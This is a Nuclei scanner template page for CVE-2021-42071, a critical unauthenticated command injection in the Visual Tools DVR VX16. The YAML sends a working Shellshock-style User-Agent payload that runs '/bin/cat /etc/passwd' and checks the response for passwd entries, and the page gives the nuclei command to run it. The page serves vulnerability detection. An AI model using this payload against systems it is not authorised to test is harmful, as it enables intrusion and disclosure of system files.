Skip to content
Nuclei Templates

Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection

ID: CVE-2021-42071

Severity: critical

Author: gy741

Tags: cve2021,cve,edb,visualtools,rce,oast,injection,visual-tools

Description

Section titled “Description”

Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

YAML Source

Section titled “YAML Source”
id: CVE-2021-42071


info:
  name: Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
  author: gy741
  severity: critical
  description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
  remediation: |
    Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device.
  reference:
    - https://www.exploit-db.com/exploits/50098
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42071
    - https://visual-tools.com/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-42071
    cwe-id: CWE-78
    epss-score: 0.95674
    epss-percentile: 0.99369
    cpe: cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: visual-tools
    product: dvr_vx16_firmware
  tags: cve2021,cve,edb,visualtools,rce,oast,injection,visual-tools


http:
  - raw:
      - |
        GET /cgi-bin/slogin/login.py HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100957d1da544c3eea83dbb6612a5dfdfbfee47fe861ee55ce24ff75e1aef46903b022078d9411ecce235e426b91155a2432eb8ae220287191c405660da09738022e40a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-42071.yaml"

View on Github